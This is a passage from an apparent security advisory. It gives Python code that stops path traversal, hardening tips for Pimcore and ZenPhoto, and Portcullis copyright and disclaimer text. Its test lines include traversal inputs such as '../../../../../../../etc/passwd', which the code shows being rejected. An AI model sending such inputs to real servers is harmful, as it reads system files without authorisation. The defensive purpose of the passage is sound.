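    """Raised when a user-supplied path would resolve outside the allowed directory."""


def resolve_under(base: str, *user_parts: str) -> str:
    """Join user-controlled parts onto base and refuse anything that escapes it.

    realpath() collapses '..' segments and symlinks *before* the comparison, and
    commonpath() (rather than startswith) stops "/srv/app" from accepting
    "/srv/app-config/...". An absolute user part replaces base inside
    os.path.join, so it is caught by the same comparison.
    """
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, *user_parts))
    try:
        common = os.path.commonpath([base_real, candidate])
    except ValueError:          # different drives on Windows: certainly outside
        common = None
    if common != base_real:
        raise PathOutsideBase(candidate)
    return candidate


def is_contained(base: str, *user_parts: str) -> bool:
    """Boolean form of resolve_under for callers that only need a yes/no."""
    try:
        resolve_under(base, *user_parts)
        return True
    except PathOutsideBase:
        return False


def read_within(base: str, relative_name: str) -> bytes:
    """Read a file only if it lives under base.

    The fichier/theme/dir parameters quoted in the advisories would all raise
    PathOutsideBase here instead of reaching open().
    """
    with open(resolve_under(base, relative_name), "rb") as fh:
        return fh.read()


if __name__ == "__main__":
    # Constructed base directories echoing the three advisories' parameters.
    print(is_contained("/srv/soplanning/holidays", "../../../../../../../etc/passwd"))    # False
    print(is_contained("/srv/zenphoto/themes", "../../../../../var/www", "secret.php"))  # False
    print(is_contained("/srv/pimcore/assets", "../config"))                              # False
    print(is_contained("/srv/pimcore/assets", "2015/photo.jpg"))                         # True
```

For the Pimcore case, where the traversal lands on a configuration file, the containment check should be paired with a deny-by-default rule on the upload target: uploads go to the asset tree only, never to a directory chosen by the client. For the ZenPhoto theme editor, restricting the permitted file extensions in addition to the directory is a cheap second control.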



Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-4425/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

